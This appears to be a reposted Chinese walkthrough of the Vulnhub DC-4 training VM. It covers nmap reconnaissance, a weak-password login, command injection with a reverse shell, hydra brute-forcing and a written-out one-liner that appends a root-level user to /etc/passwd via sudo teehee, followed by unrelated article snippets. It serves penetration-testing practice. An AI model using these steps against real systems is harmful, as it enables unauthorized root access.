Vulnhub-dc4

靶场下载

https://download.vulnhub.com/dc/DC-4.zip

信息收集

判断目标靶机的存活地址:

# nmap -sT --min-rate 10000 -p- 192.168.1.91 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 16:36 CST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 89.15% done; ETC: 16:36 (0:00:00 remaining)
Nmap scan report for 192.168.1.91 (192.168.1.91)
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:1F:60:49 (VMware)

探测主机开放的端口信息:22 80端口,显然是在80端口上寻找突破点!

# nmap -sT -sC -sV -O -p22,80 192.168.1.91 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 16:36 CST
Nmap scan report for 192.168.1.91 (192.168.1.91)
Host is up (0.00034s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:1F:60:49 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口上的信息显示 title位system tools! 然后服务器中间件nginx 1.15.10版本!

# nmap -sT --script=vuln -p22,80 192.168.1.91 -oN vuln.nmap  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 16:38 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.91 (192.168.1.91)
Host is up (0.00063s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.91
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.91:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.91:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:1F:60:49 (VMware)

默认漏洞脚本探测出来的信息是存在一个登录的界面,然后就没然后了~

渗透测试

先访问80端口,看看上面存在什么服务:

管理员的登陆界面!源码中也没什么东西:

先来尝试几个弱口令,和sql注入等:

302跳转,跳转之后还是回到了登陆界面:

尝试进行爆破但是,会发现一直跳转,于是使用了nikto去探测了一下:

也没什么结果,我感觉肯定是弱口令进去,能有命令执行的地方,于是乎,又回到了弱口令上,继续尝试:

admin 111111	登陆成功(马上就要接近去看大佬们的wp的边缘了)

进来之后可以命令执行!

可以列文件哈:

这里抓包看看数据包中 是不是存在着命令。

果然猜测的一点点问题都没有哈!存在POST方式传递的命令,尝试直接修改命令:

先随便看看文件内容是啥,然后尝试去反弹shell:

同时kali起监听:

准备提权啦!看了下文件login.php中的内容,居然密码是happy,那么为什么登陆进来了?

提权

首先确认靶标信息是没什么问题的,就是我们的目标机器!

没有任何的sudo权限;

查看了/etc/passwd文件,发现了这个文件存在几个活跃的用户!

于是分别进入到这三个用户的家目录下面,看看都存在什么东西:在jim家目录下面发现了一个文件,具有777的权限!

test.sh文件居然是777的权限哈!看看这个文件干了什么:

输出了几句话~ 看看定时任务中是否执行了这个文件:

可是没有定时任务,那么这个文件貌似就没什么用处! 但是这个文件一看就是提权文件!继续看看其他的东西,于是发现了backups目录,进去看看:

发现了之前的密码的备份文件,查看该文件中的内容:

发现了很多的密码,这里尝试将他们复制出来,利用hydra进行爆破即可!

拿到了账号和密码信息,ok了;直接登陆吧!

sam家目录下面什么都没有;(上面再进行爆破,速度比较慢)

没什么问题哈 ,直接ssh登陆进来!这次再看一下sudo权限:

哦,还是没有sudo权限,我还以为是能以root权限去执行test.sh呢 想多了~ 还是去看一下suid权限的文件:

但是还是无法提权。于是往回看,发现再ssh连接成功的时候,提示了一句you have mail

会想到jim家目录下面的mbox:

看到确实是存在邮箱信息,直接find命令找一下吧:

find / -name "mail" 2>/dev/null

于是在/var/mail下面发现了jim文件:

这个文件中存在一个密码,这个邮件是charles发给jim的,里面有个密码!先翻译下:

哦,登录的密码,直接ssh吧:

^xHhA&hvim0y

ssh登陆成功之后,又去看了sudo:

teehee是一个小众的linux编辑器,这里存在sudo权限,因此可以用来做提权!核心思路是利用起在passwd文件中追加一条uid为0 的用户条目:

echo 'root1:$1$iQZA4LYc$DGBqvpQpPjAjXa7OsfMBf/:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

添加成功,切换到root1:

读取flag文件:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/642335.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

三、MySQL之创建和管理表

一、基础知识 1.1 一条数据存储的过程 存储数据是处理数据的第一步 。只有正确地把数据存储起来,我们才能进行有效的处理和分析。否则,只 能是一团乱麻,无从下手。 在 MySQL 中, 一个完整的数据存储过程总共有 4 步,分别是创建数据库、确认字段、创建数据表、插入数据。 …

在字节5年被优化,太难了。。。

🍅 视频学习:文末有免费的配套视频可观看 🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 先简单说下,涵哥是某不知名 985 的本硕,17 年毕业加入字节,以…

自学网安-DNS

01DNS Domain Name Service域名服务 作用:为客户机提供域名解析服务器 02域名组成 2.1域名组成概述 如"www.sina.com.cn"是一个域名,从严格意义上讲,"sina.com.cn"才被称为域名(全球唯一),而"www"…

layui 自定义日期选择器今日、昨日 、本周、本月、上个月等

1、layui 日期选择器 laydate日期选择器 <div class"layui-input-inline"><input class"layui-input" id"dateTime" placeholder"日期范围"> </div><script> layui.use([laydate], function () {laydate.ren…

QT upd测试

QT upd测试 本次测试将服务器和客户端写在了一个工程下&#xff0c;代码如下 widget.h #ifndef WIDGET_H #define WIDGET_H#include <QWidget> #include<QUdpSocket> #include<QTimer>QT_BEGIN_NAMESPACE namespace Ui { class Widget; } QT_END_NAMESPACE…

编程入门:五个你必须知道的编程常识

常识1&#xff1a;编程不仅仅是写代码 当我们谈论编程时&#xff0c;大多数人首先想到的是写代码。这是正确的&#xff0c;但并不完整。编程不仅仅是写代码&#xff0c;而是解决问题的一种方式。编程是一种工具&#xff0c;我们使用它来创建能够解决特定问题的产品和服务。 比…

qmt和ptrade有什么区别?国内免费量化交易软件精选:让你轻松上手量化交易!

QMT 和 PTrade 是两个不同的平台&#xff0c;具有不同的功能和特点。 QMT&#xff08;Quantitative Market Trading&#xff09;是一种量化交易平台&#xff0c;主要面向专业的量化交易员和机构交易员。它提供了一系列的工具和功能&#xff0c;帮助交易员进行定量分析、模型开…

C#用DateTime.Now静态属性返回日期的星期信息

目录 一、使用的方法 1.Now属性 2.ToString方法 二、示例 使用DateTime结构的Now静态属性&#xff0c;可以方便地获取系统日期信息。调用时间对象的ToString方法&#xff0c;在该方法的参数中添加适当的格式化字符串&#xff0c;将返回日期的星期信息。 一、使用的方法 1…

【Linux】安装n卡驱动,美化gnome

文章目录 1.换源以及更新&#xff08;十分重要不要跳过&#xff01;&#xff09;2.安装依赖&#xff08;十分重要不要跳过&#xff01;&#xff09;3. 安装n卡驱动独显与核显切换nvidia-settings消失忘记安装依赖无法进入图形化界面的急救命令行无响应办法 gnome美化安装-tweak…

【网络安全】-基本工具msf

secure 1、有此漏洞的目标主机2、无此漏洞的目标主机&#xff08;常用&#xff09; ps.本着兴趣爱好&#xff0c;加强电脑的安全防护能力&#xff0c;并严格遵守法律和道德规范。msf&#xff08;metasploit framework&#xff09;是一个开源的渗透测试框架&#xff0c;用于开发…

JAVA:OFD Reader Writer 开源库技术解析

1、简述 OFD Reader & Writer 是一个由开源社区推动的 OFD 文件处理库&#xff0c;它旨在提供对 OFD 格式文件的读取和写入功能。这一开源项目为开发者提供了强大而灵活的工具&#xff0c;使得在应用程序中处理和生成 OFD 文件变得更加容易和高效 开源地址&#xff1a;htt…

【RF FILTER 仿真】滤波器 Ansys Electronics not ADS

第一&#xff0c;声明 全网搜索&#xff0c;用这个HFSS继承的介绍非常少&#xff0c;并且没有什么指导意义。所以有必要写一下&#xff0c;就像之前的xpedition,总要挑战一下吧。本文仅仅和大家学习研究&#xff0c;对比ADS体会一下差别。 第二&#xff0c;记录直接开始&…

【服务器】安装Docker环境

目录 &#x1f33a;【前言】 &#x1f33c;1. 打开Xshell软件 &#x1f33b;2. 安装Docker环境 ①&#xff1a;下载docker.sh脚本 ②&#xff1a;列出下载的内容 ③&#xff1a;执行一下get-docker.sh文件&#xff0c;安装docker ④&#xff1a;运行docker服务 ⑤&…

openEuler操作系统安装+部署+配置

目录 一、下载 二、创建虚拟机实例 三、安装部署 四、配置OpenEuler22.03 1、登录账号 2、Xshell建立连接 3、关闭防火墙及SELinux 4、修改主机名修改root密码 5、配置yum源 6、查看网卡配置 7、用yum下载软件 8、网络配置 1&#xff09;nmtui --图形化界面配置 …

攸信UMS工业配送AMR F1引领智能物流发展,侨智大会瞩目焦点

近日&#xff0c;由中国侨联、福建省人民政府共同主办的第一届中国侨智发展大会在福州开幕。本次大会以“五洲聚‘福’汇侨智&#xff0c;同心共圆中国梦”为主题&#xff0c;立足福建、服务全国、面向海外&#xff0c;吸引了来自37个国家和地区的一千余名海内外嘉宾参会。 01|…

98.乐理基础-记号篇-装饰音记号(六)倚音

内容参考于&#xff1a;三分钟音乐社 上一个内容&#xff1a;97.乐理基础-记号篇-装饰音记号&#xff08;五&#xff09;颤音-CSDN博客 从历史的发展上来讲&#xff0c;倚音本质上是分为短倚音 和 长倚音这两种类型&#xff0c;但是长倚音确实是一个目前看上去没有什么意义的…

火车票车票查询-Python

一、相关代码 # Time: 2024/1/22 20:24 # Author: 马龙强 # File: 实现12306查票购票.py # software: PyCharm """网址&#xff1a;https://www.12306.cn/index/ 数据&#xff1a;车次信息 查票链接&#xff1a;https://kyfw.12306.cn/otn/leftTicket/queryE?…

常用界面设计组件 —— 数字输入和显示组件

2.3 数字输入和显示组件2.3.1 QSpinBox 与 QDoubleSpinBox2.3.2其它数值输入和显示组件 2.3 数字输入和显示组件 2.3.1 QSpinBox 与 QDoubleSpinBox QSpinBox用于整数的显示和输入&#xff0c;一般显示十进制 数&#xff0c;也可以显示二进制、十六进制数&#xff0c;而且可以…

GEE错误——Image (Error) Image.select: Pattern ‘SR_B1‘ did not match any bands.

错误 我花了大量时间试图解决这个问题,但我找不到解决办法。开发人员和小组成员,我需要你们的帮助,这是我学习项目的一部分。 原始代码链接: https://code.earthengine.google.com/ccd8eb582aa520b970f4dee2d5118def Image (Error) Image.select: Pattern SR_B1 did …

02 MyBatisPlus核心功能之基于Mapper接口/Service接口实现CRUD+分页查询

项目结构&#xff1a; 1.1 Insert方法 // 插入一条记录 // T 就是要插入的实体对象 // 默认主键生成策略为雪花算法&#xff08;后面讲解&#xff09; //返回值是影响条数 int insert(T entity);1.2 Delete方法 // 根据 entity 条件&#xff0c;删除记录 int delete(Param(…